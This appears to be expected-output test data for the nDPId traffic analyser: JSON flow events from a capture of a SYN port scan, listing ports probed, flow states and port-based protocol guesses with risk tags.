-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275059345,"flow_last_seen":1278275059407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275059345,"flow_last_seen":1278275059407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00791{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 